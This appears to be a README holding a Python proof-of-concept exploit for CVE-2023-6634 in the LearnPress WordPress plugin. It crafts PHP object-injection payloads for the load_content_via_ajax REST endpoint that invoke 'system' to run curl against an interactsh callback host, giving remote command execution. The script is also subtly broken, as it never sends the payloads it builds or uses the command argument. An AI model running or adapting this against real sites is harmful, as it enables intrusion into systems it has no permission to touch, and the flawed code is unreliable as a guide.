README.md
Rendering markdown...
import sys
import requests
from urllib.parse import quote
def construct_final_url(interactsh_url, padstr):
# This function would typically construct the final URL using the interactsh_url and padstr.
# For simplicity, we'll just concatenate them, but you might need more complex logic here.
return f"{interactsh_url}{padstr}"
def exploit(target_url, interactsh_url, command):
padstr = "random_string" # Or generate a random string
finalurl = construct_final_url(interactsh_url, padstr)
# Encode the command for URL inclusion
encoded_command = quote(command)
payloads = [
f'GET /wp-json/lp/v1/load_content_via_ajax/?callback={{"class"%3a"LP_Debug","method"%3a"var_dump"}}&args="{padstr}" HTTP/1.1',
f'GET /wp-json/lp/v1/load_content_via_ajax/?callback={{"class"%3a"LP_Helper","method"%3a"maybe_unserialize"}}&args="O%3a13%3a\u0022WP_HTML_Token\u0022%3a2%3a{{s%3a13%3a\u0022bookmark_name\u0022%3bs%3a64%3a\u0022curl+{finalurl}\u0022%3bs%3a10%3a\u0022on_destroy\u0022%3bs%3a6%3a\u0022system\u0022%3b}}" HTTP/1.1',
# Add more payloads as needed
]
headers = {
'Host': target_url.replace('http://', '').replace('https://', ''),
'Connection': 'close'
}
for payload in payloads:
# Construct the full URL for the request
request_url = f"{target_url}/wp-json/lp/v1/load_content_via_ajax/"
# Send the request
try:
response = requests.get(request_url, headers=headers, timeout=10)
print(f"Payload sent. Response:\n{response.text}")
except Exception as e:
print(f"Error sending payload: {e}")
if __name__ == "__main__":
if len(sys.argv) != 4:
print("Usage: python CVE-2023-6634.py <target_url> <interactsh_url> <command>")
sys.exit(1)
target_url, interactsh_url, command = sys.argv[1], sys.argv[2], sys.argv[3]
exploit(target_url, interactsh_url, command)